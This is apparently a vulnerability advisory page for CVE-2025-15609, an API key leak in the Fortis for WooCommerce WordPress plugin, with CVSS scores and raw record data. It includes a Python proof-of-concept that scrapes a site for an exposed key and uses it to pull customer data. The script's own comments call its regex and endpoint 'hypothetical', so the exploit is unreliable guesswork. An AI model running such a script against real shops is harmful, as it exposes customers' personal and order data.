Security Vulnerability Report
CVE-2025-15609 CVSS 7.5 HIGH

CVE-2025-15609

Published: 2026-05-19 07:16:29
Last Modified: 2026-05-19 14:38:40

Description

The Fortis for WooCommerce WordPress plugin before 1.3.1 may leak sensitive API keys to unauthenticated attackers, allowing them to query Fortis' API and retrieve sensitive customer information, like past orders, PII, etc.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available in the record; the affected product, per the description, is:

Fortis for WooCommerce < 1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2025-15609
# This script demonstrates how an attacker might extract an exposed API key and query data.
import requests
import re

target_url = "http://target-wordpress-site.com"

# Step 1: Fetch the main page or specific JS file to find the API key
response = requests.get(target_url)

# Hypothetical regex pattern to find the Fortis API Key (adjust based on actual implementation)
# Pattern looks for 'api_key' or similar variable assignments
# (triple-quoted raw string so the embedded quote characters do not terminate the literal)
api_key_pattern = r"""api_key['"][\s:=]['"]([a-zA-Z0-9]{32,})['"]"""
match = re.search(api_key_pattern, response.text)

if match:
    leaked_key = match.group(1)
    print(f"[+] API Key found: {leaked_key}")

    # Step 2: Use the leaked key to query Fortis API (Hypothetical Endpoint)
    fortis_api_url = "https://api.fortis-service.com/v1/customer_data"
    headers = {
        "Authorization": f"Bearer {leaked_key}",
        "User-Agent": "CVE-2025-15609-Scanner"
    }
    data_response = requests.get(fortis_api_url, headers=headers)

    if data_response.status_code == 200:
        print("[+] Successfully retrieved sensitive data:")
        print(data_response.json())
    else:
        print(f"[-] API request failed with status: {data_response.status_code}")
else:
    print("[-] API Key not found in the response.")
```

References

https://wpscan.com/vulnerability/220f72ea-e3b4-44c9-8c9b-15662aebb6cb/
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-15609",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T07:16:29.327",
    "lastModified": "2026-05-19T14:38:39.660",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Fortis for WooCommerce WordPress plugin before 1.3.1 may leak sensitive API keys to unauthenticated attackers, allowing them to query Fortis' API and retrieve sensitive customer information, like past orders, PII, etc."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/220f72ea-e3b4-44c9-8c9b-15662aebb6cb/",
        "source": "[email protected]"
      }
    ]
  }
}
```